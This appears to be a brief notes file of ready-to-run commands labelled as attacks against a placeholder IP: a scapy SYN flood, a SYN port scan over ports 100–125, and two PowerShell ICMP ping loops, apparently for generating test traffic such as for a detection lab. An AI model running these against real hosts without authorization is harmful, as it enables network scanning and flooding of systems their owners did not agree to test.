SYN FLOOD ATTACK : python -c "from scapy.all import IP, TCP, send; send(IP(dst='[IP_ADDRESS]')/TCP(dport=999, flags='S'), count=40, verbose=False)"

Port Scan att : python -c "from scapy.all import IP, TCP, send; [send(IP(dst='[IP_ADDRESS]')/TCP(dport=p, flags='S'), verbose=False) for p in range(100, 126)]"

ICMP ATTACK : 1..50 | ForEach-Object { ping -n 1 -l 10 -w 500 [IP_ADDRESS] > $null }

Icmp: 1..50 | ForEach-Object {
    $p = New-Object System.Net.NetworkInformation.Ping
    $p.SendPingAsync("[IP_ADDRESS]", 500, [byte[]]::new(10)) | Out-Null
}

